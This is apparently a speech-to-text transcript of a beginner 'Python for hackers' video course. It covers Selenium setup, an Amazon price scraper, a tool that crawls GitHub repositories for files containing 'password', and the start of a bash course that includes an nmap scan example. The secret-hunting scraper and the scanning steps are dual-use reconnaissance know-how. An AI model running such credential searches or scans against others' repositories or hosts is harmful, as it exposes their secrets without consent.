Chrome and follow along with me and we're going to also need to install the Chrome web driver so what you will need to do is download the version of the Chrome driver that matches your Google Chrome installation in order to find out what version of a chrome you are running you will come up here click the three dots you will go down to help and you'll click about Google Chrome and then I am running this version right here in order for me to update my Google Chrome if it doesn't match any of these over here then I would just have to close out of chrome completely you just go and close the app and it will automatically update and I am running this version right here 101.0 and I would come back over here and I would say 101.0 for me it would be this one I would click this and then it will bring you to this page looks exactly like this and it will tell you what version of software you're running and you will click that version so if you're running Windows as your operating software you click Windows Mac Mac or Linux for Mac I use this one right here and when you install it remember where you put it because we are going to need to know the complete file path in order to reach the Chrome driver I have mine stored right here in a folder on my desktops so if I if I open this up I have my Chrome driver right here and I will need to know where this is we will need to know the entire path and you can do this you can see the full path by clicking by right clicking and going to get info and then it will tell us where the full path is at right here because it tells us where and then we say Mac User Ryan desktop the folder is developer and then we hit the Chrome driver so you will need to go ahead and install Google Chrome and then install the Chrome Drive driver and we will continue walking through how to finish setting up selenium when you have finished doing that after you have downloaded the zip go ahead and unzip it and it will automatically unzip into your downloads and then you can drag it into a different folder like I have I've just made one called developer and you can go ahead and drag yours out of your downloads or you can leave it in your downloads if you choose the only reason I move it out of my downloads is because sometimes I go and delete everything out of my downloads folder and I don't want to delete this if I am using it for the Mac users after you've downloaded this and you have moved it into your location where you would like to keep it for me I'm going to just go like this I will open back up this folder I'm going to show you what we did earlier just go to get info you can now copy this as your full path and then we can say our Chrome drivers we'll go CDP for our path and then you can paste it in here just like this and I believe we need our to go slash Chrome driver so we'll go slash Chrome driver and this entire thing will need to be inside quotations now I'm going to cover the installation of selenium for Windows users okay for our Windows users what we're going to do now is Click Chrome driver win32 and it will download we will open up where this is it's going to say we want to how do you want to open this file we'll just say we'll just go ahead and open it it says we now have this chrome driver and it tells us that this is an application if you don't have any place in particular you want to store it go ahead and put it in your C drive but before we do that we'll just open this up we will make a new folder and do the same thing we did on the Mac and we will say developer and we'll just leave this here and we can go back to our downloads where we grabbed this folder the and we extracted our Chrome driver and we're going to put this into the developer now the reason I had to do that is because when you look at the location of where this is stored it is really simple to get to it tells us that it is in C developer we can copy this we will put it inside of a string and then we will put slash and now we will do the same thing we did on the Mac and we will say the Chrome driver path and now we have that stored as a variable sorry to my windows friends I forgot to mention that when you run this chrome driver you will need the dot exe in order to get the executable to run and pretty much everything from this point on is going to be the same as I run it on my Mac if you have any problems please let me know in the comments and I will try to help you out okay we are ready to install selenium so the way we're going to do this is we're going to import selenium just like this and because I have done it before and I have already installed it on my Mac this is here and ready for me but what you may need to do is it will have a red squiggly line and it'll pop up a window like this and you're going to click install or import I can't remember which it is but I think it's installed and you'll click install and it will take just a second to go ahead and install that and then what you're going to want to do is type in from selenium and then we're going to import the Webdriver now that you have installed selenium and typed in from selenium import web driver we're going to initialize our Webdriver and we're going to type in driver equals Webdriver dot Chrome because that's the browser we're using there are other browsers if you've chosen to go that path and now we're going to type in our executable path and the reason this is yellow is because this has to be capitalized like this and we're going to type in executable path which I believe is actually deprecated and I have not gone back and read the documentation for the new way to run this without the executable path but we're going to type in CDP it's just going to give us a error when we run this or it's just going to give us a warning saying that this is this version is deprecated for running the window the Webdriver but that's okay we will get our program to run without it it just means that they are not updating the executable path like this anymore and now what we're going to do is type in driver.get and we're going to type in something like www.google .com and then once this is done we're going to want our driver to close the window so you can type in driver.close but I don't like to use driver.close personally because it just closes the window but we will be still running the Chrome down here in our browser I want it to cl to quit I wanted to close that window all the way out to save on my memory space on my Mac so we're going to type driver dot quit just like this and if you run this like I will and you run a Windows it's automatically going to run for us it should open without any warnings and give us google.com and then it will close this page for us all right and the reason this is giving this this airs because we need to type in HTTPS slash slash google.com now when we run this it should open up Google for us and close the file so that is how we run it but if you're on a Mac if you're on Windows that worked for you and you didn't get any problems if you're on a Mac and this is the first time you've ever ran selenium you're going to get a little error that pops up with a window and it's going to say move to trash or cancel or close you're going to click cancel or close out of your two options you're going to come up here you're going to go system preferences you're going to go security and privacy and right here it will say that you tried to run a Chrome extension and it was blocked you will click allow if you're not allowed to click allow you can unlock it by clicking this and typing in your password to unlock your Mac and then click allow and then you can relock it then when you close out of this and you rerun it it will give you the option to open anyway and you'll have a new pop-up and you will just click open and it will begin running and working for you just like this on your Mac now it is time to begin some of our web scraping okay so we are at our screen and it looks like this I've decided to go ahead and show you how to get rid of this deprecating warning so when we run our program and it runs this right here telling us that the executable path has been deprecated just in case they stop using this in the future I want to go ahead and show you the way to get rid of this I'm going to use running the executable path because I believe that it is faster and I might be wrong and that's okay and you can run selenium however you choose you can run it the deprecated way or the current version I think they're version four if you choose but we'll have to import a few more services from selenium so we'll go from selenium dot Webdriver dot Chrome dot service import and then we're going to import service and then we're going to need to import the Chrome driver manager so we're going to go Webdriver manager dot Chrome and we're going to import Chrome Drive manager just like this now I'm going to comment this out because I'm going to use it as we go through but you can delete this if you want to use the num the non-deprecated version and I think you're still going to get these red inputs down here or these red warnings that's going to tell you like it's installing the newest version of the Webdriver every single time you run it but that's okay and we're going to type in s equals and then we're going to type in our service and then we're going to run our Chrome driver manager and we're going to call this and then we will call the install function and the reason we're going to do this is because every time you run this service it is going to check to see what version of Chrome you are running so we'll just comment this out so we're not getting this warning and this dot needs to go I did this wrong we'll go like this all right it is not wanting to work for me so we'll close it off manually and then we're going to hit dot install right here we're going to call this method and then we have to close off this hole line here and now we're going to turn this over to our driver and it's going to equal the Webdriver dot Chrome and then we're going to use the service and it's going to equal s just like this now if we uncomment our driver down here we'll have no errors and when we run this it will now work for us and it's going to tell us we're using this is the version of Google Chrome that we're using if you remember we checked our version earlier and then we installed the Chrome driver and it tells us we have the Chrome driver that matches our version and it is found in Cache so it now works this is the non-deprecated way to run this tool I decided to go ahead and show this to you like I said just in case the way right here the deprecated version to get to the Chrome driver is no longer supported in the future all right I have gone ahead and commented out this code and I'm going to use the Chrome driver that is on my computer that we already installed there's one more thing we're going to need to import in order to not get any deprecation errors and that is the buy we're going to import buy so we're going to type in from selenium.webdriver dot Chrome or sorry not Chrome dot common and then we're going to use buy and then we're going to import and then buy like this if I can get back there like this and this is another update with selenium the way I originally learned selenium we didn't have to use this but they have updated it again so we will need to use this by module here so what we're going to do is open up Amazon and I'm going to show you how this scrapes if you've ever wondered why you have to answer questions to make sure you're not a robot you're going to find out in this course so if we come over to a web browser and we type in Amazon and we go to Amazon and let's say we want to buy a new drill bit so we just say we want a drill set okay we're getting a drill set not a drill bit and we click on this drill and we really want this drill but we don't want to pay 43 dollars for it we want to pay 38 for it we can actually set up our web driver to go out and check this price for us so what we would do is we would inspect this and we can look for the class right here and it's going to tell us that it's 43. so you could set this up let's say instead of 43.99 we don't really care about the 99 Cents and we just want it to be less than 38 so 37.99 would work we could use this span but for the sake of getting the 99 involved we will use this one right here for our project so we'll go ahead click on this and we're going to use this class right here and we're going to grab a class out of these right here and we want to grab one that looks really unique that isn't going to be used anywhere else and this class looks really unique to me so I'm going to go ahead and copy this and then we'll come back over to our Chrome driver thank you and underneath of our google.com we're going to type in price equals and then we want the driver to scan through all of this Source right here the HTML and we're going to tell it we want to find an element and we want in element by a class name so we want to make sure we don't have Elements by class name we want a single element by the class name later we're going to use the one with the S and this is the deprecated version I forgot this is the version that I learned when I was using this what we do here now is we delete all of that and we delete that and we come in here and we say buy Dot classname and in here we're going to put that class name that we just copied just like this the next thing we need to do is update this https right here and it needs to be this URL right here so that way our Chrome driver opens up the right URL scans through all the HTML it's going to look for the class name that possesses this and then we want it to print the price like this so we'll say print and then we want to print the price so if we run this how it is right now I'll show you what our output is it gives us this as our output and this is not helpful so what we need to do in order to grab the plain text is Type in text so now if we run it it's going to print out for us our 43.99 and I'll show you what would be useful if we're we're really going to turn this into a web scraper for us it really would be useful to get rid of this 99 and just use this right here so you can see why it's printing the way it is this span 43.99 and it's given it to us on different lines so we should be able to copy let's try this class right here and this really is when you're making these going to be a lot of trial and error as you're going to see in a little bit when we make our new dumpster diving ethical hacking tool and we try to automate some of our Recon where it's going to be a lot of trial and error so we'll let this run and we get the dollar sign that is not what we want so we'll try this one and we will paste this in here and now we can run it and see what comes back and we grab just the 43. so now if we wanted this to run say every 20 minutes to see if Amazon has updated their price and brought it down below 38 dollars we're gonna put all of this inside of a function that is going to get called every 20 minutes and we're going to have to import a new module for this and we're going to do that in the next section all right now that we have our web scraper working let's say we wanted to go out and check the price every five minutes or 30 minutes or whatever we want it to be and then let us print it into the console what we would do in this case is put this into a while loop and so what we can do is take this and we can say while on and then we want the on to be true all the time so we'll say on equals true and this should be familiar to you if you have gone through the first part of our python for hackers and then we're going to need this inside of a function that gets called every four seconds or 30 minutes and we'll need this inside of a function that gets called every so many minutes in our case I'm going to set it to only five seconds so that way we don't have to wait very long but in a real case scenario you would make this run maybe once a day or every couple of hours to check the price but for now we're going to make a function and we're going to call it five we'll call it five seconds we'll call our function and then we will need all of this to be inside of our function and now we need to call the function like this and we will say five seconds and then we are going to take this and we need this to sleep so we'll say time dot sleep and you will need to import time up here if you have not already and we're going to say sleep for five seconds now when we run this it's going to take five seconds it's going to launch our driver go out check the price and print it down here in our console for us and then once it gets done doing that it's going to wait five more seconds and then it is going to launch the browser again and check the price for us and it will do this for all eternity because we are inside what's called an infinite Loop there's no way for this Loop to end and so it's just going to keep on going and printing for us the price until we stop the program so this isn't really helpful for us in the world of hacking so we're going to stop here I just want you to get this concept down of using selenium setting up functions using a while loop if we were to use this completely for our daily use we would have to make an if statement and say if the price is equal to or less than 38 dollars then have it we would import another module and we would have it send us an email or a text message saying the price is ready for us to go and buy it but we're not going to finish this out because it's not really going to be helpful for us in the world of hacking so we'll move on to building our actual tool for hacking I have cleaned out my text editor here just to get it down to the Bare Bones of what we are going to need as we build this tool I have put this right here this is the GitHub repo that we're going to be going through and a dumpster diving for now this should work for any GitHub page if we program this right but I made this GitHub page just for us to test against to make sure our tool is running I didn't want to spam an actual GitHub account that is in use so this is just a GitHub account that I made for the purpose of showing you how to build this tool so what we're going to make in the end is a tool that when we run it it runs what Target would you like to run against and so we're going to copy the URL of the GitHub page that we want to scan and when we run it it's going to go out to GitHub it's going to click on the repo it's going to click on the pay on the code it's going to go to the raw and then it is going to tell us a password was found inside this page and so what you could do is just copy this or click on it and it will take you to this GitHub page and you can search for where this password was used so we're going to make a very basic program just like this one and I hit a lot of the code it's down there I didn't want you to get a head start so as we make this tool when we're done it's going to be very basic but I would challenge you to make it your own and add to it different files that you wanted to search for different keywords make it print the entire line where the password's found so you don't actually have to go out to this page and check it these are things that I've done I with my tool that I've made just like this and so I want to show you guys how to get started making this tool and then add on to it and make it your own okay as we go through building this tool there are a few things we're going to do at the beginning that I'm going to tell you to change at the end to make the type the entire tool work well for you so what we're going to do at the beginning is we're just going to get rid of this right here because we want to put in our repo that we're going to be scanning against and I'll leave that GitHub repo up unless it ends up getting taken down by GitHub because it is getting scraped over and over and over by people from all over but until then I'm going to just leave this GitHub page up for you guys so we'll just put that inside of our GitHub page and now we can comment this out and it should open up that page for us and then quit and it did so there it ran and what we're going to do in the end is we will change this and we will make this an input but we're going to cover that at the end when we get to that section now that we have it so it'll open up this page for us we want it to grab something for us by an element and because usually there's a bunch of repositories in here we're going to just use the repositories instead of getting the element by let's say the class name get at the element we're going to make it get Elements by classmate by class name and I'll show you what I mean in just a second so we'll go in here and we will say we need this class titled repo okay and this is what these will be titled as for us and we have this anchor tag right here so what we're going to do is we'll do the same thing we did in the last one we're going to say that the repository and we'll name this as we'll call this our res for resources and we're going to turn it into a variable and it's going to get for us all the repos by the class name so we'll say driver dot find element and then we want this to be an S and the reason we want this to be an S is because we want to find all the elements and we're going to store them inside this variable now for this cause there is only one right here but this should work with many repos if you scan a GitHub page with many elements with the class name of repo so we'll go we'll continue and type in buy Dot class name we don't want a class we want the class like this class name and the class name is repo just like this now if we run this it will go and it will click this page and then it will close so what I want to do is I'm going to add in time dot sleep and we'll make this two seconds so that we can see what's happening and then we'll make another time.sleep right here so that you can see that it clicks onto the next page so we'll run this it's going to open and wait two seconds and then it's going to open this repository right here and close so now what we are so now what we need to do is make a for Loop so that way we can print the repos that are on this page and in this case there's only going to be one but we're going to go ahead and make this for Loop and we'll say 4 I in all these listed resources we want to print and we want to print I and what we would do here is we'd say print I dot text because we want to see it in the text format and then it will equip for us I should have gotten rid of the sleep for us and I see I spelled that wrong and that's okay I made that repository late at night and it's all right that it isn't quite right it's still a repository and we can still scan against it so it prints for us this repository right here so now that we know we can Loop through all of the resources that have the element class name repo we need to figure out how can we click on those and there is a click function that we're going to use later but right now I want us to go through and see how we can do this a different way it's going to be a little more complicated but it's always best to know there are multiple ways to do something especially in the world of coding and in the world of hacking all right because we're not going to use the click function we need to see what happens when we click on this link right here now this is something in cyber security that you're going to need to always do when you're testing a page not that we're testing GitHub but when you test a page it's always good in practice to click and see what happens how to use the page to see what's going on and what we're going to do is check out this URL so this is the URL that we start out with and since since it just changes the repo name as into the new directory what we're going to need to do is take this directory and put it into a new link and get our Webdriver to open this up since we know we can run this and I'll go ahead and comment out these time sleep because we don't need those no more since we know we can run this and we can get it to scrape all of the repositories and then print them down here now we can just save these into a list and then we can Loop through that list and get it to append that to our URL this is a little more complicated than the click function but it's helpful because we will need so that way we can get it to open every single repository that we go through in the future when we go through a page that has a lot of repositories on it so what we will end up doing is making a list which you've seen in the past and if you want you can pause the video and see if you can figure out how to make a list on your own if you remember and so I'm just going to name our list as links and we're going to make it empty and what we're going to do now is we're going to take this and we're going to say links dot append which I don't think you've seen before and we want to append I so now if we take this and we move it over and we print we need to append I dot text so that way we get it right I dot text and now we print the links right here we should get the repository to print from our list so we'll run this and give it a test and it says we have repository and we have the brackets and it is inside the list so what we will do now that we have this list is we're going to make another for Loop and we can comment this out because we don't need that to print every time and in this for loop we're going to name it four L for the links inside the links list we're going to make a new we're going to make a new variable and we're going to call it next page and this is when I tell you my variable naming becomes very poor because I'm not very creative and we're going to make this an F string and we're going to call the repo and if you remember and we're going to call the repo but we need to first name it something so we need this URL to be assigned to a variable and so we'll just call this our repo and at the end we're going to change this because this is going to be an input and we're going to make this a string just like this and now we have this repo right here and we'll add a slash so that way we don't have to later actually we'll delete the Slash and we'll add it down here in our string give us some practice with that so we're going to take this repo and because it's a variable it needs to be in an F string with these curly braces and we're going to add in our slash and then we will add in another variable which is going to be our l so what would happen if we had a bunch of repos this is going to go through all of the links which we saved right here as our resources it's going to get all the links this for Loop is going to run through all these links and it's going to put them into our list that we have called links and if you remember this is where our repositories will be saved now we need to Loop through there and in this for loop it's going to Loop through our links and it's going to give us a new URL so what this URL will look like after it runs through this this second for Loop is it will look like this and it will come out with our res pository that I spelled wrong and it's going to open up this page and it will go and click this link for us so this is the repo we want to attack it will click this and it will bring us to this page so let's try go ahead and try this we're going to run this with a sleep command when we are ready so what we need to do at this point is store our next page in a new link and we'll just call this our final link so we'll just call it f-link and we will save this into a list and then we're going to append our new URL remembering what this one right here is going to look like because it's going and looping through a second time of this links and it's making our new URL that we want to test which is going to be this one right here and we will tell this to a pen so we're going to do F link dot append and we want to append the next page and we're going to want it to append to the next page right here so as we have this next page it if we print this it's going I'll show you what it looks like so if we print this we can say print and then we're going to print the F link and we'll just go ahead and pull this back here and we will run this and it'll show us what our new URL looks like I accidentally left this slash that's okay the browser would have just deleted this second slash so now if we run it again it's going to spit out for us this new link and if you copy this link or just click on it it will take you we'll just click on it it'll take you to this page and so that is how far we have gotten so now we have moved with selenium from this page to the next page and where we're headed is inside this main.pi and then we're going to go into the Raw and then we want to know if in any of this there is a password or some kind of keyword and so I'll just show you if we type in command fine and we type in pass we'll see this password admin we're going to make our program go through all of these words and all these lines inside this text and pull down the password for us so that's where we're headed but right now we've got a few pages more we need to move we are right now on this landing page right here so we'll make we'll try and figure out how to make it open this page and then go into the raw and then search for the password so we'll keep going in the next section okay it is time to call our first function so we can go ahead and comment out this print statement right here and we can call our first function and we're going to call it above our for Loops because we need our function to be called above where the function needs to be located above where we call the function so we will call this function we'll just call it a loop because we're going to Loop through all the links so we will call it like this we'll say Loop and then we're going to pass in the next page because that's what we want to go searching through in this function so this is red because we haven't declared our function and we'll declare it up above and we will say Def and we'll call it our Loop and then we're going to pass in a function we'll actually just call it our next page that way we understand what's happening next page and we have to add in our two dots there and now what do we want to do and now that we can get to the next page now there's a couple of things we need to do the first thing is we need to open that new page so we're going to type in driver.get and then we want it to open that next page so let's see what happens we can come right here we'll just not run the time function and have it sleep and see what happens so we'll run this and see if it opens the page and we can see it or it goes too quick it went too quick so we'll stop right here and we'll say time dot sleep and we'll sleep for two seconds that way we can see if it actually opened the next page and it opens the next page and then it quits so now that we know we're able to get to the next page we need to be able to open this file right here and get to this RAW button so in order to do that what I think would be best is to inspect this link and see if we can find what these links what specific we'll see what specific class these links all have in common so that way we can run selenium to pull all the links that would hold every single file within this repository so we can inspect this and it will tell us this is the line and so we'll just go ahead and click this first class and see if it works so we'll just copy this and now we'll need a new resource so we'll call this we'll just call it resource two because I'm terrible at naming variables and if I had more time to think about it I would probably come up with something better but you can name it whatever makes sense to you so if I made this tool and somebody else just saw it online they wouldn't be able to understand what's going on because I suck at naming variables but you can name your variables better than me and so we're gonna I'm gonna let you name your own variables but I'm going to name mine resource two because I suck at naming variables so we're gonna go driver Dot and we're going to do a find elements just like this one and then we're going to say by class name this should be getting familiar to you by now and then the class name is the one we just copied if this works it should be able to print for us that we should be able to print for us this class right here we'll see we can actually get it to print main.pi so what we'll do is we'll print and then we'll print the resource2 dot text okay apparently we don't need dot text we'll just print resource two and see what happens and that has run and it does need resource2.txt and the reason that this is not working is because we need it to Loop through this links this resource that could be holding multiple this variable that could be holding multiple links within it so like we did down here we will need to go four and we can call this I if we want but I'm going to change it so that way you don't get confused by all these different variables in our for Loops we'll call it 4A in resource two and then we're going to print resource2 dot text we're going to and we're going to print instead of resource2.text we're going to print a DOT text so that way we can make sure it is printing for us the main dot Pi so that way we can tell it to click on main.pi so we can and now what we're going to do is we're going to do a comparison inside of an if statement we're going to comment this out and instead of getting this little error right here we're going to type in pass so that way it will ignore the air for us and we're going to say if the letters together is pi are in a DOT text then we want to do something we're going to say print it worked Pi is in the text so now if we run this right here oh I see an error we're going to get a problem it says it worked right here but the reason this right we get this right here is it says this is a local variable inside of this segment so this is really not good practice if you were working for a company as a programmer you wouldn't do this but we're not looking to work in a company as programmers we're looking to use programming for hacking and so what we're going to do is we're going to make this a global variable we're going to say a is now a global variable and can be accessed anywhere and it gets rid of this for us the reason you wouldn't want to make this Global let's say we made this this for loop with the I and we said it's a global now this I variable everywhere we used it is going to be everywhere in our code so we cannot use the variable a anywhere else outside of this because we have made it a global variable and that is really not good programming practice but for the sake of our tool it doesn't really matter so we're going to use it we'll run this and it should work for us and it says it worked a pie is in the text what we'll do is we can do the same thing we did before and we can click on this main.pi and look at our URL so that the way we know how to structure it and then after this time I promise we'll use the click function or the click method actually and it'll make it much easier for us so the way we would go about this we'll delete this is going to be similar if you want you can try and do something like this and get the next page based off this URL that we see right here so if you want to take this challenge you can go ahead and do this now and for everyone else I'll walk you through it now we'll call this uh we'll just call it second page because I'm so good at naming variables and then we're going to make this an F string just like we did down here and we're going to add all this together to get that new URL so we're going to go ahead and we're going to say repo and let's see what did we name this one down here we named it we'll just call it repo because we have the repo up here we'll just copy this actually we'll just leave this so we'll just use the repo how it is and then we'll just add in this right here and we can copy that and paste it in and then we'll add our slash for the new page that we're going to want to go to and we'll add this variable in right here a DOT text so we'll say a DOT text and now if we print second page we should get a URL printed that looks exactly like this and the reason we did it this way is because we're going to be looping through in this for Loop all of the links and we need these links right here so if there was let's say we had a main dot pi and then we had a CSS a main.css and then we had a index.js and then we had index.html or we had file.php and there's a whole bunch of files inside this program we would want to Loop through all of these files for us so what we're going to do is set it up this way so you can add to it so as an example would be like if Js was in a DOT txt then it would do the JS instead of Pi for us so that's actually a challenge for you I'll show you how to add those on and then I'll let you complete the tool as you see fit so what we're going to do for now is we're just going to print this second page and it's going to open it and it's going to tell us right here and we can even add in a time.sleep so that way you can see that it has worked so it did print for us right here okay so I just noticed if you click this page it takes us to a page not found and when you compare the two URLs we're missing this repository right here so what we will need to do is add in an extra repository and let's actually see if we can just grab this next page right here so We're looping through what would be considered the next page where's our Links at okay so we'll see if we can Loop through the next page right here so we'll add in instead of repo we need it to have that repository on it so we can say next page which is getting passed through our function and now let's print it and see if this works for us it's paused and we have the repository and if we click on it it brings us to the next page that we want and if we were going to add on to this program let's say like I was showing you if there's a JS inside the file so like if this is a Javascript file instead of python or maybe we want to check for JavaScript and Python and maybe later we want to add PHP we can do that and so we can say a DOT text and then we can say right here we need to close this off and then we could say this exact same thing and then we would print whatever it is that we want to test for so we would say we're going to go to a new page if a JavaScript is found then we're going to do this and then we can add turn we would turn this into an alif and it would say okay there's no Javascript file so because there's no Javascript file we're going to check for a python file and so we'll go ahead and run this make sure we have no errors and it's going to pass this Javascript file and it's going to go straight into the python file for us so we run this and it passes this right here and then it closes and it pulls down the main dot Pi so what you would do if you wanted to make this a comprehensive tool you would say if there's a PHP if there's JavaScript if there's a Json and any other kind of file that you might want to check for sensitive data but because the repo we're working with to build this tool doesn't have any of that I'm going to just leave it with python and I'm going to challenge you to make the if statements and the Lyft statements and the else statements all on your own and maybe you can go look at repos and see what you want the program to open up to look for passwords now that we know that works we're going to comment out this sleep function because we don't need it we also don't need it to print the second page what we're going to do now is we're going to call a second function inside of this function so it's kind of getting like the movie Inception we have a function that we're calling inside of another function but we're going to do this one in a much easier method so we're going to go ahead and we're we're going to call this one function is going to be called going for raw and I'll show you why I'm naming it that going for raw this is going to be the best variable name I have ever come up with and then we're going to pass in the second page and then we'll make the function up here and we'll call it def and we're going to call it going for raw we'll call the function we're going to pass in second page this is actually going to be the third page we might actually change this inside here this parameter in just a second so what we are going to be doing is going for the raw so now that we're able to get to this page we want to click this button so that way we can get to this page so in order to click this button it is going to be so much easier than what we've been doing as we've been editing this right here the URL and adding to it what we're going to do is just click the button so we can inspect this right here and C where is it we'll inspect see if it can pull it up for me okay now that we have inspected it and you can see when we hover over this right here we can see this RAW button so now what we need to do is the same thing we've been doing and we need to find a class and see if we can find a class that is used only with that button and get it to open up this raw so that way we land on this page right here we're just going to copy that class name that I just showed you right here and see if that can open up this tab for us so now under this function what we're going to do is we're just going to say we're going to type in raw equals and then we're going to say driver dot find elements actually this time instead of elements plural we're going to do just one element and we're going to say by dot class name just like we have been and then we will type in we'll paste in our link right here and now what we're going to do is something really simple we're just going to say raw dot click and it's going to click that button for us and then what we'll do is we'll come over here we'll click this okay now that we're able to get to this page we're going to tell it that we want the page Source we're going to want it to right click and say view page source and then we're going to grab all of this inside of an F string and then see if we can find a password in it and what that's going to look like is something like this we want the HTML HTML and we're going to say driver Dot Page source that way it grabs the page source for us like we I just showed you as the same as right clicking it in view page source we wanted to grab that and then we're going to put this into an F string and we're just going to change the HTML we'll just use that same variable and we'll say HTML is going to be equal to this HTML inside of an upstream because we want it to be converted into a string so we'll say HTML so now we have this in a string and just to check it we can say and just to check this we can say print and then we want to print HTML and now when we run this it's going to print all of that page source for us into our console and we want to make sure that it is in a string did I we have an error let's see if we let's see if we can find the error here we need to use driver dot get and then we need to get the second page right here so now if we run this it should work and it clicked the button and it printed all of this for us and let's see if it printed here we have the tags for us and now that we have this printed and it's printed inside of the HTML so we know we grabbed the entire page we can close out of this we don't need this print statement what we're going to do now is really similar to what we did down here we're going to say if the password is in HTML we want it to print found a password so we'll say print found password and now we can run this and if it finds the word password inside of the HTML it's going to print found password and if we wanted to we can turn this into an F string and it we can get it to print for us the actual URL where the password was found and we can say something like this we'll make this an F string and say we want to print second page so it'll say found the password and it'll print the page for us and we could click on this second page and go to it we're getting this error here because we need to put this inside of our string so if we print this now it'll tell us it found the password and it'll give us the page to go to right here to check and see what is the context of this password now to finish off our tool so that way we can scrape any page on GitHub that we want remembering that we have to get to the page like this we can go ahead and copy this and we're going to make an input and we're going to name our input scrape scrape just like this and we will say equals and we're going to make this an input and we're going to say what page would would you like to scrape just like this question mark space and now this scrape we're going to pass into our driver.get right here so we will to pass in scrape and we're going to make this an F string and we'll say scrape and then we'll highlight it put it inside curly braces and now when we run this it should ask us for an input what page would you like to scrape and then we put in our page making sure we remember the https and now when we run this it should run the page for us and now you can run it against other repos and it is a complete tool for you if you have any suggestions on a tool that you think we should build next that shouldn't be too difficult for us as we are just learning python please let me know down in the comments and if you have made it this far in the video please like And subscribe welcome to my crash course on bash this is not a complete course I am currently working on a complete course in bash for hackers that is going to be really comprehensive and more focused on if you want to learn how to become a bash programmer or how bash programming works if you were to work in a company and you needed to know the bash language this course is specifically for those who want to be able to modify exploits and be able to Be an Effective penetration tester or ethical hacker and know the bash language well enough that you can modify exploits and maybe even write some of your own scripts so that you can accomplish all your purposes in The Bash world I know that is hard to believe you can do in the short span of 45 minutes but that is the goal of this course so if you are interested in the more advanced course it is coming and you are welcome to subscribe and wait for that course to come out but in the meantime enjoy this one all right Welcome to our bash scripting course we're going to start off with the download of Visual Studio code a lot of people like to just write bash scripts inside Nano or G edit or Vim but I don't think that's very useful for you as a beginner because we're going to use few plugins that we can install on Visual Studio code so you can go right here to the link right here which is in the description and you can click this download right here and you can click it and then you can click download if it doesn't go then you will save and say okay I have already installed it so I'm not going to download it again it will look like this when it's downloaded in to your downloads okay and then the command that you will need to insert into your terminal is this one right here so you will be in your home directory so you will CD over to your downloads you will LS and you will see this right here you will type this into your terminal right here and then hit enter and it will install this might take up to about 30 seconds but I have already installed it so I'm not going to run this right here again and just for reference if this is not the exact same file that you have you can just type in sudo apt install and then you can type in dots your dot slash and then just start to type in code like this and then hit Tab and it will auto complete that for you so you don't have to go through and type in all of these numbers in so once that is done installing you can come over to your the drop down and type in Visual Studio code and it will be right here and you will launch this and this is where we're going to be writing our code now some of the plugins we're going to be installing is Shell Code and you can come over to your little bar right here and you will click this one right here and you're going to search and we're going to search for shell check just like this and install this top one you can click it I already have it installed you'll be able to click install just like this right here then we're going to use shell Dash format just like this it'll look like this and you will click install then we're going to want to Shellman and it is right here and you will install and then we want bash debug just like this you can click on that and click install and now our text editor is up and going and it is ready for us to open up a file and get started so now what we're going to do is make a folder on our desktop we can come back to our terminal and type in CD CD desktop and now we can make a directory and we'll just call this bash and then actually we're going to name that something else so we'll move bash and we'll call it Bash Scripts and now if we LS we have bash scripts right here and we can CD into bash scripts and then we can touch and we'll call this file.sh and we're going to name a bunch of different files as we go through and write programs this is just to get us started so now we'll open our folder we'll go to desktops we'll go to our desktop bash scripts and then we'll open up we'll want to open up the whole folder and it will have our bash file in here now in order to get this started we'll just type in bash and hit enter and it's going to give us our shebang up here without going into too much detail here what we're going to do instead of running the default that our plugin uses for us is we're just going to run a bin bash and you're going to see this a lot and I don't want to confuse you with a bunch of environmental variables so we're just going to run Bend bash and if you want to you can go read about why we would run bin bash instead of user Ben NV bash and so this is how we're going to run this and then just to make sure everything is working talking we can type in Echo and then say hello world and then we'll hit command save and after we type in hello world we'll come down to our terminal and this should be in our bash scripts you can LS and it'll tell us we have our file right here you can type in bash file.sh and it prints hello world for us so we know everything is up and going and ready all right now that we know we have everything working let's go ahead and cover a few things that we have typed in here so when we see this right here the this is the hash and the exclamation point which can also be considered as a hash and a bang which is where the shebang comes from and this tells the Linux machine when it runs this file it's going to be running it as a bash command so that's why when we come in here and we type in bash and then we run this bash with this file it's going to execute everything after this as a bash and so then we have this echo which it if you're familiar with python it looks like we would run a print statement like this and then we would put our text in here and then we would say hello world so the echo is the same as the print in Python and so when we run this that's why we have this a hello world printed out at the bottom now there's a couple other things I want to cover just to help you as you go along and you make notes sometimes we'll write scripts and you might not remember okay what is the echo command you can make what's called a comment on a Mac you can press control and then the question mark or the Slash and then you can type anything in here and this is commented out so it won't show up in the file so we can say Echo will print the text and then when we come down here when we save it and now if we run it it'll say hello world and this does not get printed no matter how many of these we have in here or on however many lines it won't it will not make a difference so when we run this this is all commented out so now that we have a basic understanding of what's on the screen we're going to move on the first place to start is with variables variables store data and it can look like this so we're going to name it just VAR because it is simple for us to understand that it is a variable and then they will go inside of quotations because it's going to represent a string and you can put your name in there so if I put in Ryan you can think of the variable as holding my name Ryan so if I decided to Echo and I wanted to not Echo an array and I wanted to Echo out the variable we put the dollar sign just like this and then we type in VAR and if I wanted to say hello like this and then VAR and I need a new terminal which is right here and we can come down here and we can just say bash file.sh and it says hello Ryan so this seems really simple but you will need to grab variables they are super important and we will be using them all the time in the programming world so right now as you look at this you think this seems very silly why wouldn't I just go like this that seems like an awful a lot of work why wouldn't I just type in Ryan and the reason for that is because you may need to take an input at some point later on we will do this but for now we're just going to type it in here we could just put in an IP address so we could say IP address right here I'm not going to put a real IP address in there just for the sake of this video and down here you can type in in map and then you can say Dash a dash p dash and then now where we would normally put the IP address you can just type VAR and then we put a dash fee for for verbose and now if we save this and run it we would get the variable would be the IP address so if we had an IP address in here of 10 10 10 10. and we ran this right here it's going to start scanning this for us and you can see that scan started so variables are really important because later we could make a complete Recon tool we could ask the user when they run the file what IP address would you like to scan and we would put in this and then our variable whatever the user puts in would be stored and our inmap would run so that's an example of how we would use a variable in the world of hacking you will see this all the time in exploits when you grab them off of xydb they'll ask for inputs which will be stored in variables and maybe in the future you will need to modify them so that is a variable a very simple version of a variable okay so one of the reasons I struggle with bash so much is because the way they name their functions for example and python if we made a name and let's say we had an input and somebody input their name like this if we wanted this to just be all caps we would just put Dot Upper at the end of our function call or dot lower but in bash we do it a little different I notice this is supposed to say name if we echoed this and we say Echo dollar sign parentheses and we say name and then we don't forget to save it and we run this we get my name output here but if we wanted to get just the first little letter capitalized we would put in a carrot and then we had to save it and now when we run it my bad we need a double carrot I forgot to save it now when we run it we get all caps just like this and then if we wanted all lowercase we just put in two pure two commas and we can save it and run it and now we hit all lower so in the world of bash when you need to do something if we 